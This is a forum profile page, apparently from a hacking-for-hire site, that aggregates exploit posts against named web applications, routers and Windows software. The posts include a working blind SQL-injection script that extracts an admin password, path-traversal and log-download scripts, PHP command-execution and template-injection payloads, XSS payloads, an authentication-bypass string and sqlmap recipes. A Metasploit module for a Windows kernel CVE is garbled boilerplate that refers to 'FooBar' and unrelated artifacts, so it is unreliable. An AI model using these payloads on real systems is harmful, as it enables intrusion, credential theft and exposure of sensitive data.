Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Broken Access Control - on NodeBB v3.6.7

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Broken Access Control - on NodeBB v3.6.7 Date: 22/2/2024 Exploit Author: Vibhor Sharma Vendor Homepage: https://nodebb.org/ Version: 3.6.7 Description: I identified a broken access control vulnerability in nodeBB v3.6.7, enabling attackers to access restricted information intended solely for administrators. Specifically, this data is accessible only to admins and not regular users. Through testing, I discovered that when a user accesses the group section of the application and intercepts the response for the corresponding request, certain attributes are provided in the JSON response. By manipulating these attributes, a user can gain access to tabs restricted to administrators. Upon reporting this issue, it was duly acknowledged and promptly resolved by the developers. Steps To Reproduce: 1) User with the least previlages needs to neviagte to the group section. 2) Intercept the response for the group requets. 3) In the response modify the certian paramters : " *"system":0,"private":0,"isMember":true,"isPending":true,"isInvited":true,"isOwner":true,"isAdmin":true, **" *". 4) Forward the request and we can see that attacker can access the restricted information. *Impact:* Attacker was able to access the restricted tabs for the Admin group which are only allowed the the administrators.
  2. HireHackking

    Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) # Google Dork: n/a # Date: 04/02/2024 # Exploit Author: Gian Paris C. Agsam # Vendor Homepage: https://github.com/projectworldsofficial # Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip # Version: 1.0 # Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12 # CVE : n/a import requests import argparse from colorama import (Fore as F, Back as B, Style as S) BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection') parser.add_argument('-u', '--url', help='') args = parser.parse_args() def banner(): print(f"""{FR} ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄ ▄▄▄ ▪ ·▄▄▄▄ ▪ ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪ ██ ██▪ ██ ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄ ▄█▀▄ ▐█·▐█· ▐█▌ ▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██ ▀█▄▀▪▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀ ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀• Github: https://github.com/offensive-droid {FW} """) # Define the characters to test chars = [ 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '@', '#' ] def sqliPayload(char, position, userid, column, table): sqli = 'admin\' UNION SELECT IF(SUBSTRING(' sqli += str(column) + ',' sqli += str(position) + ',1) = \'' sqli += str(char) + '\',sleep(3),null) FROM ' sqli += str(table) + ' WHERE uname="admin"\'' return sqli def postRequest(URL, sqliReq, char, position): sqliURL = URL params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"} req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10) if req.elapsed.total_seconds() >= 2: print("{} : {}".format(char, req.elapsed.total_seconds())) return char return '' def theHarvester(target, CHARS, url): #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id'])) print("Retrieving admin password".format(target['table'], target['column'], target['id'])) position = 1 full_pass = "" while position < 5: for char in CHARS: sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table']) found_char = postRequest(url, sqliReq, char, position) full_pass += found_char position += 1 return full_pass if __name__ == "__main__": banner() HOST = str(args.url) PATH = HOST + "/hotel booking/admin/login.php" adminPassword = {"id": "1", "table": "manager", "column": "upass"} adminPass = theHarvester(adminPassword, chars, PATH) print("Admin Password:", adminPass)
  3. HireHackking

    Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal # Date: 2024-03-06 # Exploit Author: Ven3xy # Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip # Version: 2.7.10 # Tested on: Linux import sys import requests from urllib.parse import urljoin import time def exploit(target_url, file_name, depth): traversal = '../' * depth exploit_url = urljoin(target_url, '/wp-admin/tools.php') params = { 'page': 'backup_manager', 'download_backup_file': f'{traversal}{file_name}' } response = requests.get(exploit_url, params=params) if response.status_code == 200 and response.headers.get('Content-Disposition') \ and 'attachment; filename' in response.headers['Content-Disposition'] \ and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0: print(response.text) # Replace with the desired action for the downloaded content file_path = f'simplebackup_{file_name}' with open(file_path, 'wb') as file: file.write(response.content) print(f'File saved in: {file_path}') else: print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.") if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python exploit.py <target_url> <file_name> <depth>") sys.exit(1) target_url = sys.argv[1] file_name = sys.argv[2] depth = int(sys.argv[3]) print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n") time.sleep(5) exploit(target_url, file_name, depth)
  4. HireHackking

    liveSite Version 2019.1 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: liveSite Version : 2019.1 Campaigns Remote Code Execution ### Date: 2024-1-9 ### Exploit Author: tmrswrr ### Category: Webapps ### Vendor Homepage: https://livesite.com/ ### Version : 2019.1 ### Tested on: https://www.softaculous.com/apps/cms/liveSite 1 ) Login with admin cred Click Campaigns > Create Campaign > Choose format Plain Text , write in body your payload : https://127.0.0.1/liveSite/livesite/add_email_campaign.php Payload : <?php echo system('cat /etc/passwd'); ?> 2 ) After save you will be see result : Result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash pinguzo:x:992:992::/etc/pinguzo:/bin/false webuzo:x:987:987::/home/webuzo:/bin/bash apache:x:986:985::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
  5. HireHackking

    OpenCart Core 4.0.2.3 - 'search' SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://github.com/opencart/opencart/releases # Version: 4.0.2.3 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=product/search&search=test - New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs =========== Output : Parameter: search (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: route=product/search&search=') AND 2427=2427-- drCa Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb
  6. HireHackking

    ASUS Control Center Express 01.06.15 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path Privilege Escalation # Date: 2024-04-02 # Exploit Author: Alaa Kachouh # Vendor Homepage: https://www.asus.com/campaign/ASUS-Control-Center-Express/global/ # Version: Up to 01.06.15 # Tested on: Windows # CVE: CVE-2024-27673 =================================================================== ASUS Control Center Express Version =< 01.06.15 contains an unquoted service path which allows attackers to escalate privileges to the system level. Assuming attackers have write access to C:\, the attackers can abuse the Asus service "Apro console service"/apro_console.exe which upon restarting will invoke C:\Program.exe with SYSTEM privileges. The binary path of the service alone isn't susceptible, but upon its initiation, it will execute C:\program.exe as SYSTEM. Service Name: AProConsoleService binary impacted: apro_console.exe # If a malicious payload is inserted into C:\ and service is executed in any way, this can grant privileged access to the system and perform malicious activities.
  7. HireHackking

    GL-iNet MT6000 4.5.5 - Arbitrary File Download

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download # CVE: CVE-2024-27356 # Google Dork: intitle:"GL.iNet Admin Panel" # Date: 2/26/2024 # Exploit Author: Bandar Alharbi (aggressor) # Vendor Homepage: www.gl-inet.com # Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin # Tested Model: GL-X3000 Spitz AX # Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md import sys import requests import json requests.packages.urllib3.disable_warnings() h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'} def DoesTarExist(): r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h) if r.status_code == 200: f = open("logread.tar", "wb") f.write(r.content) f.close() print("[*] Full logs archive `logread.tar` has been downloaded!") print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!") return True else: print("[*] The `logread.tar` archive does not exist however ... try again later!") return False def isVulnerable(): r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h) if r1.status_code == 500 and "nginx" in r1.text: r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h) if "Admin-Token" in r2.text: j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]} r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h) ver = r3.json()['result']['firmware_version'] model = r3.json()['result']['model'] if ver.startswith(('4.')): print("[*] Firmware version (%s) is vulnerable!" %ver) print("[*] Device model is: %s" %model) return True print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!") return False def isAlive(): try: r = requests.get(url, verify=False, timeout=30, headers=h) if r.status_code != 200: print("[*] Make sure the target's web interface is accessible!") return False elif r.status_code == 200: print("[*] The target is reachable!") return True except Exception: print("[*] Error occurred when connecting to the target!") pass return False if __name__ == '__main__': if len(sys.argv) != 2: print("exploit.py url") sys.exit(0) url = sys.argv[1] url = url.lower() if not url.startswith(('http://', 'https://')): print("[*] Invalid url format! It should be http[s]://<domain or ip>") sys.exit(0) if url.endswith("/"): url = url.rstrip("/") print("[*] GL.iNet Unauthenticated Full Logs Downloader") try: if (isAlive() and isVulnerable()) == (True and True): DoesTarExist() except KeyboardInterrupt: print("[*] The exploit has been stopped by the user!") sys.exit(0)
  8. HireHackking

    Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.rapid7.com/ # Software Link: https://www.rapid7.com/products/nexpose/ # Version: 6.6.240 # Tested: Windows 10 x64 # Step to discover Unquoted Service Path: C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Nexpose Security Console nexposeconsole "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" Auto LocalSystem # Service info: C:\Users\saudh>sc qc nexposeconsole [SC] QueryServiceConfig SUCCESS SERVICE_NAME: nexposeconsole TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Nexpose Security Console DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  9. HireHackking

    Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://code-projects.org # Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/ # Version: v1.0 # Tested on: Windows 10 # CVE : CVE-2024-29412 # Description: Stored Cross Site Scripting vulnerability in Hospital Management System - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the 'patient_id', 'first_name','middle_initial' ,'last_name'" in /receptionist.php component. # POC: 1. Go to the User Login page: " http://localhost/HospitalManagementSystem-gh-pages/ 2. Login with "r1" ID which is redirected to " http://localhost/HospitalManagementSystem-gh-pages/receptionist.php" endpoint. 3. In Patient information functionality add this payload "><script>alert('1')</script> ,in all parameter. 4. click on submit. # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md
  10. HireHackking

    E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: v1.0 # Tested on: Windows 10 # Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the Firstname and lastname parameter in the profile component. # POC: 1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile 2. In fname & lname parameter add payolad "><script>alert("Hacked_by_Sandy")</script> 3. click on submit. # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md
  11. HireHackking

    Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) # Date: 02/04/2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: v1.0 # Tested on: Windows 10 # CVE: CVE-2024-29410 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component. # POC: 1. Here we go to : http://127.0.0.1/fuelflow/index.php 2. Now login with default username=mayuri.infospace@gmail.com and Password=admin 3. Now go to "http://127.0.0.1/fuelflow/admin/web.php" 4. Upload the san.php file in "Image" field 5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page 6. The content of san.php file is given below: <?php phpinfo();?> # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md
  12. HireHackking

    Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24499 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > /employee_akpoly/Admin/edit_profile.php > Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection. ![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true) ![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true) ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### SQLMap Save the following request to `edit_profile.txt`: ``` POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 88 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/edit_profile.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate= ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump ``` ## Recommendations When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
  13. HireHackking

    LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-1-19 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.lepton-cms.com/ # Version : 7.0.0 1 ) Login with admin cred > https://127.0.0.1/LEPTON/backend/login/index.php 2 ) Go to Languages place > https://127.0.0.1/LEPTON/backend/languages/index.php 3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?> 4 ) After click install you will be see result # Result : uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)
  14. HireHackking

    Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    ############################################# # Exploit Title : Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation # Exploit Author: E1 Coders # CVE: CVE-2024-21338 ############################################# require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact def initialize(info = {}) super( update_info( info, 'Name' => 'CVE-2024-21338 Exploit', 'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.', 'Author' => 'You', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2024-21338'] ] ) ) register_options( [ OptString.new('RHOST', [true, 'The target address', '127.0.0.1']), OptPort.new('RPORT', [true, 'The target port', 1234]) ] ) end def check connect begin impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar') rescue Rex::Post::Meterpreter::RequestError return Exploit::CheckCode::Safe end Exploit::CheckCode::Appears end def exploit connect begin impacket_artifact( dcerpc_binding('ncacn_ip_tcp'), 'FooBar', datastore['FooBarPayload'] ) rescue Rex::Post::Meterpreter::RequestError fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact' end handler disconnect end end #refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338
  15. HireHackking

    FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure. Steps to Reproduce: Log in as an administrator on the Flarum forum. Navigate to the FoF Pretty Mail extension settings. Edit the email default template and insert the following payload at the end of the template: {{ include('/etc/passwd') }} Save the changes to the email template. Trigger any action that sends an email, such as user registration or password reset. The recipient of the email will see the contents of the included file (in this case, /etc/passwd) in the email content.
  16. HireHackking

    FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side Template Injection (SSTI) due to the unsafe handling of template variables. An attacker with administrative access can inject malicious code into the email template, leading to arbitrary code execution on the server. Steps to Reproduce: - Log in as an administrator on the Flarum forum. - Navigate to the FoF Pretty Mail extension settings. - Edit the email default template and insert the following payload: {{ 7*7 }} {{ system('id') }} {{ system('echo "Take The Rose"') }} - Save the changes to the email template. - Trigger any action that sends an email, such as user registration or password reset. - The recipient of the email will see the result of the injected expressions (e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id') }}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.
  17. HireHackking

    Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24494 ### Stored Cross-Site Scripting (XSS): > Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security. ### Affected Components: > add-tracker.php, update-tracker.php Vulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat ### Description: > Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page. ## Proof of Concept: The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability. Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 175 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ``` ![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true) ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
  18. HireHackking

    Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24497 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > /employee_akpoly/Admin/login.php > Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection. ![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true) ![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true) ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### Manual Exploitation The payload `' and 1=1-- -` can be used to bypass authentication within admin login page. ``` POST /employee_akpoly/Admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 61 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/login.php Cookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin= ``` ### SQLMap Save the following request to `admin_login.txt`: ``` POST /employee_akpoly/Admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 62 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/login.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtusername=admin&txtpassword=password&btnlogin= ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump ``` ## Recommendations When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
  19. HireHackking

    Daily Habit Tracker 1.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
